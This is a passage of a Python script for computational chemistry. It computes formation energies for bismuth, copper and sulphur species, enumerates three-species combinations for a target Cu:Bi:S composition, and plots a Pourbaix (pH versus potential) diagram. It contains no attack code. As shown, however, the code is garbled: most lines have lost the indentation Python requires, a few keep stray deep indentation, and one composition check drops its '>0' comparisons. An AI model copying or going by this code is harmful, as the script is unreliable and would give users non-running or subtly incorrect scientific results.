dGf_Bi14OS24=(Ee_Bi14OS24+Fvib_Bi14OS24) -14*(Ee_Bi+Fvib_Bi)-24*(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2);
dGf_Bi2SO2=(Ee_Bi2SO2+Fvib_Bi2SO2) -2*(Ee_Bi+Fvib_Bi)-(Ee_S+Fvib_S)-1.0*((Ee_O2)-Ftot_O2);
dGf_BiSCuO=(Ee_BiSCuO+Fvib_BiSCuO) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-(Ee_S+Fvib_S)-0.5*((Ee_O2)-Ftot_O2);
dGf_Cu3BiS3=(Ee_Cu3BiS3+Fvib_Cu3BiS3) -3*(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-3*(Ee_S+Fvib_S);
dGf_Cu4Bi4S9=(Ee_Cu4Bi4S9+Fvib_Cu4Bi4S9) -4*(Ee_Cu+Fvib_Cu)-4*(Ee_Bi+Fvib_Bi)-9*(Ee_S+Fvib_S);
dGf_Cu4BiS2_5=(Ee_Cu4BiS2_5+Fvib_Cu4BiS2_5)-4*(Ee_Cu+Fvib_Cu)-5*(Ee_Bi+Fvib_Bi)-10*(Ee_S+Fvib_S);
dGf_CuBiS2=(Ee_CuBiS2+Fvib_CuBiS2) -(Ee_Cu+Fvib_Cu)-(Ee_Bi+Fvib_Bi)-2*(Ee_S+Fvib_S);
#Set the reference values
dGf_Cu=0.0;
dGf_Bi=0.0;
dGf_S=0.0;
###############################################################################
###############################################################################
###############################################################################
###############################################################################
############## Aqueous Ion Free Energies of Formation #########################
#Free Energies of Formation in eV/f.u.
##Elemental Bismuth Species
dGf_Bi_3Plus= 0.6430898
dGf_BiOH_2Plus= -1.6968378
dGf_BiO_Plus= -1.4977965
##Elemental Copper Species
dGf_Cu1= 0.506502
dGf_Cu2= 0.674092
dGf_CuOH2_minus= -3.4518209
dGf_CuOH3= -5.1197432
dGf_CuOH_Plus= -1.3127387
dGf_CuOH4_2=-6.814302
dGf_CuOH2= -3.2666113
dGf_CuOH = -1.2677578
dGf_Cu2OH2_2plus=-2.942417
dGf_Cu3OH4_2plus=-6.567839
#Elemental Sulphur Species
dGf_H2S=-0.283601
dGf_HS_Minus=0.13053
dGf_S_2Minus=0.9521892
dGf_S2_2Minus=0.8563979
dGf_S3_2Minus=0.7791664
dGf_S4_2Minus=0.7204948
dGf_S5_2Minus=0.6803396
dGf_H2S2O3=-5.6329986
dGf_HS2O3_Minus=-5.6156529
dGf_S2O3_2Minus=-5.515915
dGf_S5O6_2Minus=-9.9087
dGf_S4O6_2Minus=-10.5939
dGf_HS2O4_Minus=-6.13203282
dGf_S2O4_2Minus=-5.9842
dGf_S3O6_2Minus=-9.930382
dGf_H2SO3=-5.580528
dGf_HSO3_Minus=-5.464
dGf_SO3_2Minus=-5.03457
dGf_S2O6_2Minus=-10.02
dGf_H2SO4=-7.6901922
dGf_HSO4_Minus=-7.8029389
dGf_SO4_2Minus=-7.6901922
dGf_S2O8_2Minus=-11.361
dGf_HSO5_Minus= -6.60739025
dGf_S2O5_2Minus= -8.195817793
#Water
dGf_H2O=-2.458;
###############################################################################
###############################################################################
###############################################################################
################################################################################
############# CONVERT from eV to kJ/mol ####################################
###############################################################################
dGf_Cu= dGf_Cu*F;
dGf_CuO= dGf_CuO*F;
dGf_Cu2O= dGf_Cu2O*F;
dGf_Cu1= dGf_Cu1*F;
dGf_Cu2= dGf_Cu2*F;
dGf_CuOH4_2= dGf_CuOH4_2*F;
dGf_CuOH2_minus= dGf_CuOH2_minus*F;
dGf_CuOH3= dGf_CuOH3*F;
dGf_CuOH_Plus= dGf_CuOH_Plus*F;
dGf_CuOH2= dGf_CuOH2*F;
dGf_CuOH = dGf_CuOH*F;
dGf_Cu2OH2_2plus=dGf_Cu2OH2_2plus*F;
dGf_Cu3OH4_2plus=dGf_Cu3OH4_2plus*F;
dGf_CuOH2_s=dGf_CuOH2_s*F
dGf_Bi= dGf_Bi*F;
dGf_Bi2O3= dGf_Bi2O3*F;
dGf_Bi2O5= dGf_Bi2O5*F;
dGf_Bi2O4=dGf_Bi2O4*F;
dGf_Bi4O7=dGf_Bi4O7*F;
dGf_Bi_3Plus= dGf_Bi_3Plus*F;
dGf_BiOH_2Plus= dGf_BiOH_2Plus*F;
dGf_BiO_Plus= dGf_BiO_Plus*F;
dGf_S= dGf_S*F;
dGf_H2S=dGf_H2S*F;
dGf_HS_Minus=dGf_HS_Minus*F;
dGf_S_2Minus=dGf_S_2Minus*F;
dGf_S2_2Minus=dGf_S2_2Minus*F;
dGf_S3_2Minus=dGf_S3_2Minus*F;
dGf_S4_2Minus=dGf_S4_2Minus*F;
dGf_S5_2Minus=dGf_S5_2Minus*F;
dGf_H2S2O3=dGf_H2S2O3*F;
dGf_HS2O3_Minus=dGf_HS2O3_Minus*F;
dGf_S2O3_2Minus=dGf_S2O3_2Minus*F;
dGf_S5O6_2Minus=dGf_S5O6_2Minus*F;
dGf_S4O6_2Minus=dGf_S4O6_2Minus*F;
dGf_HS2O4_Minus=dGf_HS2O4_Minus*F;
dGf_S2O4_2Minus=dGf_S2O4_2Minus*F;
dGf_S3O6_2Minus=dGf_S3O6_2Minus*F;
dGf_H2SO3=dGf_H2SO3*F;
dGf_HSO3_Minus=dGf_HSO3_Minus*F;
dGf_SO3_2Minus=dGf_SO3_2Minus*F;
dGf_S2O6_2Minus=dGf_S2O6_2Minus*F;
dGf_H2SO4=dGf_H2SO4*F;
dGf_HSO4_Minus=dGf_HSO4_Minus*F;
dGf_SO4_2Minus=dGf_SO4_2Minus*F;
dGf_S2O8_2Minus=dGf_S2O8_2Minus*F;
dGf_HSO5_Minus=dGf_HSO5_Minus*F;
dGf_S2O5_2Minus=dGf_S2O5_2Minus*F;
dGf_Cu2S=dGf_Cu2S*F;
dGf_Cu7S4=dGf_Cu7S4*F;
dGf_CuS=dGf_CuS*F;
dGf_CuS2=dGf_CuS2*F;
dGf_Cu2SO4_3=dGf_Cu2SO4_3*F;
dGf_BiCu=dGf_BiCu*F;
dGf_CuBiO2_2=dGf_CuBiO2_2*F;
dGf_BiS2=dGf_BiS2*F;
dGf_Bi2S3=dGf_Bi2S3*F;
dGf_Bi2S2O=dGf_Bi2S2O*F;
dGf_Bi2SO4_3=dGf_Bi2SO4_3*F;
dGf_Bi14OS24=dGf_Bi14OS24*F;
dGf_Bi2SO2=dGf_Bi2SO2*F;
dGf_BiSCuO=dGf_BiSCuO*F;
dGf_Cu3BiS3=dGf_Cu3BiS3*F;
dGf_Cu4Bi4S9=dGf_Cu4Bi4S9*F;
dGf_Cu4BiS2_5=dGf_Cu4BiS2_5*F;
dGf_CuBiS2=dGf_CuBiS2*F;
dGf_H2O= dGf_H2O*F;
###############################################################################
###############################################################################
###############################################################################
###############################################################################
############### Populate the species matrix ################################
###############################################################################
species=np.zeros((65,8))
######## Formation Energies ###################################################
species[0,0]=0.00;
species[1,0]=dGf_CuO
species[2,0]=dGf_Cu2O
species[3,0]=dGf_Cu1
species[4,0]=dGf_Cu2
species[5,0]=dGf_CuOH4_2
species[6,0]=dGf_CuOH2_minus
species[7,0]=dGf_CuOH3
species[8,0]=dGf_CuOH_Plus
species[9,0]=dGf_CuOH2
species[10,0]=dGf_CuOH
species[11,0]=dGf_Cu2OH2_2plus
species[12,0]=dGf_Cu3OH4_2plus
species[13,0]=dGf_Bi
species[14,0]=dGf_Bi2O3
species[15,0]=dGf_Bi2O5
species[16,0]=dGf_Bi2O4
species[17,0]=dGf_Bi4O7
species[18,0]=dGf_Bi_3Plus
species[19,0]=dGf_BiOH_2Plus
species[20,0]=dGf_BiO_Plus
species[21,0]=dGf_S
species[22,0]=dGf_H2S
species[23,0]=dGf_HS_Minus
species[24,0]=dGf_S_2Minus
species[25,0]=dGf_S2_2Minus
species[26,0]=dGf_S3_2Minus
species[27,0]=dGf_S4_2Minus
species[28,0]=dGf_S5_2Minus
species[29,0]=dGf_H2S2O3
species[30,0]=dGf_HS2O3_Minus
species[31,0]=dGf_S2O3_2Minus
species[32,0]=dGf_S5O6_2Minus
species[33,0]=dGf_S4O6_2Minus
species[34,0]=dGf_HS2O4_Minus
species[35,0]=dGf_S2O4_2Minus
species[36,0]=dGf_S3O6_2Minus
species[37,0]=dGf_H2SO3
species[38,0]=dGf_HSO3_Minus
species[39,0]=dGf_SO3_2Minus
species[40,0]=dGf_S2O6_2Minus
species[41,0]=dGf_H2SO4
species[42,0]=dGf_HSO4_Minus
species[43,0]=dGf_SO4_2Minus
species[44,0]=dGf_S2O8_2Minus
species[45,0]=dGf_HSO5_Minus
species[46,0]=dGf_S2O5_2Minus
species[47,0]=dGf_Cu2S
species[48,0]=dGf_Cu7S4
species[49,0]=dGf_CuS
species[50,0]=dGf_CuS2
species[51,0]=dGf_Cu2SO4_3
species[52,0]=dGf_BiCu
species[53,0]=dGf_CuBiO2_2
species[54,0]=dGf_BiS2
species[55,0]=dGf_Bi2S3
species[56,0]=dGf_Bi2S2O
species[57,0]=dGf_Bi2SO4_3
species[58,0]=dGf_Bi14OS24
species[59,0]=dGf_Bi2SO2
species[60,0]=dGf_CuBiS2
species[61,0]=dGf_Cu4Bi4S9
species[62,0]=dGf_Cu4BiS2_5
species[63,0]=dGf_BiSCuO
species[64,0]=dGf_Cu3BiS3
######## Electron Count #######################################################
#Cu
species[0,1]=0.00;
species[1,1]=2
species[2,1]=2
species[3,1]=1
species[4,1]=2
species[5,1]=2
species[6,1]=1
species[7,1]=2
species[8,1]=2
species[9,1]=2
species[10,1]=1
species[11,1]=4
species[12,1]=6
#Bi
species[13,1]=0
species[14,1]=6
species[15,1]=10
species[16,1]=8
species[17,1]=14
species[18,1]=3
species[19,1]=3
species[20,1]=3
#S
species[21,1]=0
species[22,1]=-2
species[23,1]=-2
species[24,1]=-2
species[25,1]=-2
species[26,1]=-2
species[27,1]=-2
species[28,1]=-2
species[29,1]=4
species[30,1]=4
species[31,1]=4
species[32,1]=10
species[33,1]=10
species[34,1]=6
species[35,1]=6
species[36,1]=10
species[37,1]=4
species[38,1]=4
species[39,1]=4
species[40,1]=10
species[41,1]=6
species[42,1]=6
species[43,1]=6
species[44,1]=14
species[45,1]=8
species[46,1]=8
#CuSOBi
species[47,1]=0
species[48,1]=0
species[49,1]=0
species[50,1]=0
species[51,1]=24
species[52,1]=0
species[53,1]=8
#BiSO
species[54,1]=0
species[55,1]=0
species[56,1]=2
species[57,1]=24
species[58,1]=2
species[59,1]=4
#CuBiS
species[60,1]=0
species[61,1]=0
species[62,1]=0
#BiCuSO
species[63,1]=2
species[64,1]=0
######## Hydrogen H+ Count ####################################################
#Cu
species[0,2]=0
species[1,2]=2
species[2,2]=2
species[3,2]=0
species[4,2]=0
species[5,2]=4
species[6,2]=2
species[7,2]=3
species[8,2]=1
species[9,2]=2
species[10,2]=1
species[11,2]=2
species[12,2]=4
#Bi
species[13,2]=0
species[14,2]=6
species[15,2]=10
species[16,2]=8
species[17,2]=14
species[18,2]=0
species[19,2]=1
species[20,2]=2
#S
species[21,2]=0
species[22,2]=-2
species[23,2]=-1
species[24,2]=0
species[25,2]=0
species[26,2]=0
species[27,2]=0
species[28,2]=0
species[29,2]=6
species[30,2]=5
species[31,2]=4
species[32,2]=12
species[33,2]=12
species[34,2]=6
species[35,2]=8
species[36,2]=12
species[37,2]=4
species[38,2]=5
species[39,2]=6
species[40,2]=12
species[41,2]=6
species[42,2]=7
species[43,2]=8
species[44,2]=16
species[45,2]=9
species[46,2]=10
#CuSBiO
species[47,2]=0
species[48,2]=0
species[49,2]=0
species[50,2]=0
species[51,2]=24
species[52,2]=0
species[53,2]=8
#BiSO
species[54,2]=0
species[55,2]=0
species[56,2]=2
species[57,2]=24
species[58,2]=2
species[59,2]=4
#BiCuS
species[60,2]=0
species[61,2]=0
species[62,2]=0
#BiCuSO
species[63,2]=2
species[64,2]=0
########### Number of Coppers Cu ##############################################
#Cu
species[0,3]=1
species[1,3]=1
species[2,3]=2
species[3,3]=1
species[4,3]=1
species[5,3]=1
species[6,3]=1
species[7,3]=1
species[8,3]=1
species[9,3]=1
species[10,3]=1
species[11,3]=2
species[12,3]=3
#Bismuth and Sulphur
species[13,3]=0
species[14,3]=0
species[15,3]=0
species[16,3]=0
species[17,3]=0
species[18,3]=0
species[19,3]=0
species[20,3]=0
species[21,3]=0
species[22,3]=0
species[23,3]=0
species[24,3]=0
species[25,3]=0
species[26,3]=0
species[27,3]=0
species[28,3]=0
species[29,3]=0
species[30,3]=0
species[31,3]=0
species[32,3]=0
species[33,3]=0
species[34,3]=0
species[35,3]=0
species[36,3]=0
species[37,3]=0
species[38,3]=0
species[39,3]=0
species[40,3]=0
species[41,3]=0
species[42,3]=0
species[43,3]=0
species[44,3]=0
species[45,3]=0
species[46,3]=0
#CuBiSO
species[47,3]=2
species[48,3]=7
species[49,3]=1
species[50,3]=1
species[51,3]=2
species[52,3]=1
species[53,3]=1
#BiSO
species[54,3]=0
species[55,3]=0
species[56,3]=0
species[57,3]=0
species[58,3]=0
species[59,3]=0
#CuBiS
species[60,3]=1
species[61,3]=4
species[62,3]=4
#BiCuSO
species[63,3]=1
species[64,3]=3
########### Number of Bismuths Bi #############################################
#Copper
species[0,4]=0
species[1,4]=0
species[2,4]=0
species[3,4]=0
species[4,4]=0
species[5,4]=0
species[6,4]=0
species[7,4]=0
species[8,4]=0
species[9,4]=0
species[10,4]=0
species[11,4]=0
species[12,4]=0
#Bismuth
species[13,4]=1
species[14,4]=2
species[15,4]=2
species[16,4]=2
species[17,4]=4
species[18,4]=1
species[19,4]=1
species[20,4]=1
#Sulphur
species[21,4]=0
species[22,4]=0
species[23,4]=0
species[24,4]=0
species[25,4]=0
species[26,4]=0
species[27,4]=0
species[28,4]=0
species[29,4]=0
species[30,4]=0
species[31,4]=0
species[32,4]=0
species[33,4]=0
species[34,4]=0
species[35,4]=0
species[36,4]=0
species[37,4]=0
species[38,4]=0
species[39,4]=0
species[40,4]=0
species[41,4]=0
species[42,4]=0
species[43,4]=0
species[44,4]=0
species[45,4]=0
species[46,4]=0
#CuSBiO
species[47,4]=0
species[48,4]=0
species[49,4]=0
species[50,4]=0
species[51,4]=0
species[52,4]=1
species[53,4]=2
#BiSO
species[54,4]=1
species[55,4]=2
species[56,4]=2
species[57,4]=2
species[58,4]=14
species[59,4]=2
#CuBiS
species[60,4]=1
species[61,4]=4
species[62,4]=5
#BiCuSO
species[63,4]=1
species[64,4]=1
########### Number of Sulphurs S #############################################
#Coppers
species[0,5]=0
species[1,5]=0
species[2,5]=0
species[3,5]=0
species[4,5]=0
species[5,5]=0
species[6,5]=0
species[7,5]=0
species[8,5]=0
species[9,5]=0
species[10,5]=0
species[11,5]=0
species[12,5]=0
#Bismuth
species[13,5]=0
species[14,5]=0
species[15,5]=0
species[16,5]=0
species[17,5]=0
species[18,5]=0
species[19,5]=0
species[20,5]=0
#Sulphur
species[21,5]=1
species[22,5]=1
species[23,5]=1
species[24,5]=1
species[25,5]=2
species[26,5]=3
species[27,5]=4
species[28,5]=5
species[29,5]=2
species[30,5]=2
species[31,5]=2
species[32,5]=5
species[33,5]=4
species[34,5]=2
species[35,5]=2
species[36,5]=3
species[37,5]=1
species[38,5]=1
species[39,5]=1
species[40,5]=2
species[41,5]=1
species[42,5]=1
species[43,5]=1
species[44,5]=2
species[45,5]=1
species[46,5]=2
#CuSBiO
species[47,5]=1
species[48,5]=4
species[49,5]=1
species[50,5]=2
species[51,5]=3
species[52,5]=0
species[53,5]=0
#BiSO
species[54,5]=2
species[55,5]=3
species[56,5]=2
species[57,5]=3
species[58,5]=24
species[59,5]=1
#CuBiS
species[60,5]=2
species[61,5]=9
species[62,5]=10
#BiCuSO
species[63,5]=1
species[64,5]=3
######### Number of H2O's #####################################################
#Copper
species[0,6]=0
species[1,6]=1
species[2,6]=1
species[3,6]=0
species[4,6]=0
species[5,6]=4
species[6,6]=2
species[7,6]=3
species[8,6]=1
species[9,6]=2
species[10,6]=1
species[11,6]=2
species[12,6]=4
#Bi
species[13,6]=0
species[14,6]=3
species[15,6]=5
species[16,6]=4
species[17,6]=7
species[18,6]=0
species[19,6]=1
species[20,6]=1
#Sulphur
species[21,6]=0
species[22,6]=0
species[23,6]=0
species[24,6]=0
species[25,6]=0
species[26,6]=0
species[27,6]=0
species[28,6]=0
species[29,6]=3
species[30,6]=3
species[31,6]=3
species[32,6]=6
species[33,6]=6
species[34,6]=4
species[35,6]=4
species[36,6]=6
species[37,6]=3
species[38,6]=3
species[39,6]=3
species[40,6]=6
species[41,6]=4
species[42,6]=4
species[43,6]=4
species[44,6]=8
species[45,6]=5
species[46,6]=5
#CuSBiO
species[47,6]=0
species[48,6]=0
species[49,6]=0
species[50,6]=0
species[51,6]=12
species[52,6]=0
species[53,6]=4
#BiSO
species[54,6]=0
species[55,6]=0
species[56,6]=1
species[57,6]=12
species[58,6]=1
species[59,6]=2
#CuBiS
species[60,6]=0
species[61,6]=0
species[62,6]=0
#BiCuSO
species[63,6]=1
species[64,6]=0
########## Aqueous Ions?????? #################################################
#Copper
species[0,7]=0
species[1,7]=0
species[2,7]=0
species[3,7]=1
species[4,7]=1
species[5,7]=1
species[6,7]=1
species[7,7]=1
species[8,7]=1
species[9,7]=1
species[10,7]=1
species[11,7]=1
species[12,7]=1
#Bismuth
species[13,7]=0
species[14,7]=0
species[15,7]=0
species[16,7]=0
species[17,7]=0
species[18,7]=1
species[19,7]=1
species[20,7]=1
#Sulphur
species[21,7]=0
species[22,7]=1
species[23,7]=1
species[24,7]=1
species[25,7]=1
species[26,7]=1
species[27,7]=1
species[28,7]=1
species[29,7]=1
species[30,7]=1
species[31,7]=1
species[32,7]=1
species[33,7]=1
species[34,7]=1
species[35,7]=1
species[36,7]=1
species[37,7]=1
species[38,7]=1
species[39,7]=1
species[40,7]=1
species[41,7]=1
species[42,7]=1
species[43,7]=1
species[44,7]=1
species[45,7]=1
species[46,7]=1
#CuSBiO
species[47,7]=0
species[48,7]=0
species[49,7]=0
species[50,7]=0
species[51,7]=0
species[52,7]=0
species[53,7]=0
#BiSO
species[54,7]=0
species[55,7]=0
species[56,7]=0
species[57,7]=0
species[58,7]=0
species[59,7]=0
#CuBiS
species[60,7]=0
species[61,7]=0
species[62,7]=0
#BiCuSO
species[63,7]=0
species[64,7]=0
#Function to determine species combinations
try:
combos=load('BiCuOS-speciesCombo.npy')
num=load('BiCuOS-numberSpecies.npy')
combo_num=int(num[0])
except OSError:
print('Cannot Open File')
###############################################################################
#### Determine which species are able to combine at the composition ###########
###############################################################################
t=1
flag=1
f=np.zeros((3))
combos=np.zeros((45000,9,3))
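#combos[c] layout: row 0 = species indices, 1 = formation energies, 2 = electrons, 3 = H+,
#rows 4-7 = Cu, Bi, S and H2O counts, row 8 = mixing fractions of the three species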
combo_num=0
combos[combo_num, 0, 0]=-1
combos[combo_num, 0, 1]=-1
combos[combo_num, 0, 2]=-1
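#Enumerate every three-species combination and keep those that can realize the target Cu:Bi:S composition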
for k in range(0, len(species)):
for m in range(0, len(species)):
for p in range(0, len(species)):
#Check to make sure each element is in this combination of species
            if((species[k, 3]>0 or species[m, 3] >0 or species[p, 3]>0) \
and (species[k, 4]>0 or species[m, 4] >0 or species[p, 4]) \
and (species[k, 5]>0 or species[m, 5] >0 or species[p, 5])):
#save species in array
t=1
a = np.array([[species[k, 3],species[m, 3], species[p,3]], \
[species[k, 4],species[m, 4], species[p,4]], \
[species[k, 5],species[m, 5], species[p,5]]])
#check to see if each species contains a single element. This is a really long call.
flag=1
if((species[k, 3]==0 and species[m, 3] ==0) or \
(species[m, 3]==0 and species[p, 3] ==0) or \
(species[k, 3]==0 and species[p, 3] ==0)):
if((species[k, 4]==0 and species[m, 4] ==0) or \
(species[m, 4]==0 and species[p, 4] ==0) or \
(species[k, 4]==0 and species[p, 4] ==0)):
if((species[k, 5]==0 and species[m, 5] ==0) or \
(species[m, 5]==0 and species[p, 5] ==0) or \
(species[k, 5]==0 and species[p, 5] ==0)):
flag=0
#if so, find the composition though linear algebra.
try:
f=np.linalg.solve(a, composition)
except:
#print('Error: Species '+str(k)+', Species2: '+str(m)+', Species3: '+str(p)+'\n')
t=1
t=0
#If there is at least one multi-element species in this combination
if(flag==1):
#test each linear combination
for h in range(1, 20):
for i in range(1, 20):
for j in range(1, 20):
                                #Is there a linear combination of the elements that will allow
                                #for the target Cu:Bi:S composition to be reached?
if(((h*a[0,0]+i*a[0,1]+j*a[0,2])/(h*a[1,0]+i*a[1,1]+j*a[1,2]))==composition[0]/composition[1] and \
((h*a[1,0]+i*a[1,1]+j*a[1,2])/(h*a[2,0]+i*a[2,1]+j*a[2,2]))==composition[1]/composition[2] and \
((h*a[0,0]+i*a[0,1]+j*a[0,2])/(h*a[2,0]+i*a[2,1]+j*a[2,2]))==composition[0]/composition[2]):
#save the composition
f[0]=h
f[1]=i
f[2]=j
                                    #Ending parameters, break out of all three loops
                                    t=0;
                                    break
                            if(t==0):
                                break
                        if(t==0):
                            break
#If there is a linear combination, save the species in the combos array.
if (t==0):
#print(str(combo_num)+': Species1: '+str(k)+', Species2: '+str(m)+'\n')
#Species Number
combos[combo_num, 0, 0]=k
combos[combo_num, 0, 1]=m
combos[combo_num, 0, 2]=p
#Energy
combos[combo_num, 1, 0]=species[k,0]
combos[combo_num, 1, 1]=species[m,0]
combos[combo_num, 1, 2]=species[p,0]
#Electrons
combos[combo_num, 2, 0]=species[k,1]
combos[combo_num, 2, 1]=species[m,1]
combos[combo_num, 2, 2]=species[p,1]
#H+
combos[combo_num, 3, 0]=species[k,2]
combos[combo_num, 3, 1]=species[m,2]
combos[combo_num, 3, 2]=species[p,2]
                    #Number Coppers
combos[combo_num, 4, 0]=species[k,3]
combos[combo_num, 4, 1]=species[m,3]
combos[combo_num, 4, 2]=species[p,3]
#Number Bismuth
combos[combo_num, 5, 0]=species[k,4]
combos[combo_num, 5, 1]=species[m,4]
combos[combo_num, 5, 2]=species[p,4]
                    #Number Sulphurs
combos[combo_num, 6, 0]=species[k,5]
combos[combo_num, 6, 1]=species[m,5]
combos[combo_num, 6, 2]=species[p,5]
                    #Number H2O
combos[combo_num, 7, 0]=species[k,6]
combos[combo_num, 7, 1]=species[m,6]
combos[combo_num, 7, 2]=species[p,6]
#Percent of each in species in final combo
f_total=f[0]+f[1]+f[2];
combos[combo_num, 8, 0]=f[0]/f_total
combos[combo_num, 8, 1]=f[1]/f_total
combos[combo_num, 8, 2]=f[2]/f_total
combo_num=combo_num+1;
t=1
#print('entered')
else:
#Catch and switch the value of t back to no
t=1
save('BiCuOS-speciesCombo.npy', combos)
save('BiCuOS-numberSpecies.npy', asarray([[combo_num]]))
print('The number of species combinations is '+ str(combo_num)+'.\n')
###############################################################################
###############################################################################
###############################################################################
###############################################################################
########### Chemical Potential Mesh Calculations ############################
###############################################################################
#should be as long as there are specicies considered
#populate with smaller values that will be calculated.
muValues=np.zeros((n+1,n+1,4))
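#muValues[i,j] holds the sorted indices of the three stable species and their minimum mixed chemical potential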
sort=np.zeros((3,1))
#fill in the grid. Calculate
for i in range(0, n+1):
#calculate the energies for each species number
pH=lowpH+(i*pHcount);
for j in range(0,n+1):
U=Ulow+(j*Ucount);
muValues[i,j,0]=-1
muValues[i,j,1]=-1
muValues[i,j,2]=-1
muValues[i,j,3]=100000000
#Go through all species, commpare all pairs
for k in range(0, combo_num):
p=int(combos[k,0,0]);
m=int(combos[k,0,1]);
s=int(combos[k,0,2]);
f1=combos[k,8,0];
f2=combos[k,8,1];
f3=combos[k,8,2];
#The first species's contribution to the mu
current_eng=species[p,0]
current_ele=F*U*(species[p,1])
current_H=R*T*np.log(10.0)*pH*(species[p,2])
current_H2O=dGf_H2O*(species[p,6])
current_aquI=R*T*np.log(nI)*(species[p,7])
current_NumEle=1
for t in range(3,6):
if(species[p,t]>1):
current_NumEle=current_NumEle*species[p,t];
current_mu=f1*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle);
#The second species' contribution to the mu
current_eng=species[m,0];
current_ele=F*U*(species[m,1])
current_H=R*T*np.log(10.0)*pH*(species[m,2])
current_H2O=dGf_H2O*(species[m,6])
current_aquI=R*T*np.log(nI)*(species[m,7])
current_NumEle=1
for t in range(3,6):
if(species[m,t]>1):
current_NumEle=current_NumEle*species[m,t];
current_mu=current_mu+f2*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle);
#The second species' contribution to the mu
current_eng=species[s,0];
current_ele=F*U*(species[s,1])
current_H=R*T*np.log(10.0)*pH*(species[s,2])
current_H2O=dGf_H2O*(species[s,6])
current_aquI=R*T*np.log(nI)*(species[s,7])
current_NumEle=1
for t in range(3,6):
if(species[s,t]>1):
current_NumEle=current_NumEle*species[s,t];
current_mu=current_mu+f3*((current_eng+current_aquI-current_ele-current_H-current_H2O)/current_NumEle);
if(current_mu<muValues[i,j,3]):
sort[0,0]=p
sort[1,0]=m
sort[2,0]=s
a=np.sort(sort[:,0])
muValues[i,j,0]=a[0]
muValues[i,j,1]=a[1]
muValues[i,j,2]=a[2]
muValues[i,j,3]=current_mu
###############################################################################
###############################################################################
###############################################################################
###############################################################################
################### Plot Pourbaix Diagram ###################################
###############################################################################
flag = np.zeros((50,6)) # The first 3 indexes are the materials stored, the next three are the colors
index=0;
fig =plt.figure()
ax=plt.subplot(111)
ax = plt.gca()
ax.set_xlim([lowpH,highpH])
ax.set_ylim([Ulow,Uhigh])
l=0;
index=0;
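#Each distinct triple of stable species gets its own random color and legend entry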
for i in range(0, n+1):
pH=lowpH+i*pHcount;
for j in range(0,n+1):
U=Ulow+(Ucount*j);
l=0
for k in range(0, len(flag)):
if(flag[k,0]==muValues[i,j,0] and flag[k,1]==muValues[i,j,1] and flag[k,2]==muValues[i,j,2]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
elif(flag[k,0]==muValues[i,j,0] and flag[k,1]==muValues[i,j,2]and flag[k,2]==muValues[i,j,1]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
elif(flag[k,0]==muValues[i,j,1] and flag[k,1]==muValues[i,j,2]and flag[k,2]==muValues[i,j,0]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
elif(flag[k,0]==muValues[i,j,1] and flag[k,1]==muValues[i,j,0]and flag[k,2]==muValues[i,j,2]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
elif(flag[k,0]==muValues[i,j,2] and flag[k,1]==muValues[i,j,0]and flag[k,2]==muValues[i,j,1]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
elif(flag[k,0]==muValues[i,j,2] and flag[k,1]==muValues[i,j,1]and flag[k,2]==muValues[i,j,0]):
ax.plot(pH,U,'.', color = [flag[k,3],flag[k,4],flag[k,5]],markersize=4)
#break loop, the color is found
k=len(flag)+1
l=1
if(l==0):
label='M1: '+str(muValues[i,j,0])+', M2: '+str(muValues[i,j,1])+' M3: '+str(muValues[i,j,2])
flag[index,0] = muValues[i,j,0]
flag[index,1] = muValues[i,j,1]
flag[index,2] = muValues[i,j,2]
flag[index,3] = random.random();
flag[index,4] = random.random();
flag[index,5] = random.random();
ax.plot(pH,U,'.', color = [flag[index,3],flag[index,4],flag[index,5]],markersize=4,label=label)
index=index+1;
#####Plot H2O and H2 lines##################################
muH=np.zeros((pHrange+1));
muH2O=np.zeros((pHrange+1));
pHArray=np.zeros((pHrange+1));
for i in range(0, pHrange):
pHArray[i] =lowpH+i;
muH[i]=-0.059*pHArray[i];
muH2O[i]=1.23-0.059*pHArray[i];
pHArray[pHrange] =lowpH+(pHrange);
muH[pHrange]=-0.059*pHArray[pHrange];
muH2O[pHrange]=1.23-0.059*pHArray[pHrange];
##############################################################
ax.plot(pHArray[:], muH[:],'c--',label='$H_2$',linewidth=1)
ax.plot(pHArray[:], muH2O[:],'b--',label='$H_2O$', linewidth=1)
ax.legend(loc='upper center', bbox_to_anchor=(1.3, 0.9), ncol=1)
plt.ylabel('Electric Potential, E(V)')
plt.xlabel('pH')
plt.title(r'Bi-Cu-S Pourbaix Diagram, $\eta_{Bi,Cu,S}=10^{-'+str(eta)+'}$, '+str(composition[0])+'Cu:' +str(composition[1])+'Bi:'+str(composition[2])+'S')
###############################################################################
############## Plot with Lines ############################################
###############################################################################
flag = np.zeros((50,6)) # The first 3 indexes are the materials stored, the next three are the colors
index=0;
fig =plt.figure()
ax=plt.subplot(111)
ax = plt.gca()
ax.set_xlim([lowpH,highpH])
ax.set_ylim([Ulow,Uhigh])
#If drawing lines for metastable phases
for i in range(1, n):
#calculate the energies for each species number
pH=lowpH+(i*pHcount);
for j in range(1,n):
U=Ulow+(j*Ucount);
#If drawing lines for metastable phases
if((muValues[i,j,0]!=muValues[i-1,j,0])):
ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2)
elif(muValues[i,j,1]!=muValues[i-1,j,1]):
ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2)
elif((muValues[i,j,0]!=muValues[i,j-1,0]) or (muValues[i,j,1]!=muValues[i,j-1,1])):
ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2)
elif((muValues[i,j,2]!=muValues[i,j-1,2]) or (muValues[i,j,2]!=muValues[i-1,j,2])):
ax.plot(pH,U,'.', color = [0.0,0.0,0.0],markersize=2)
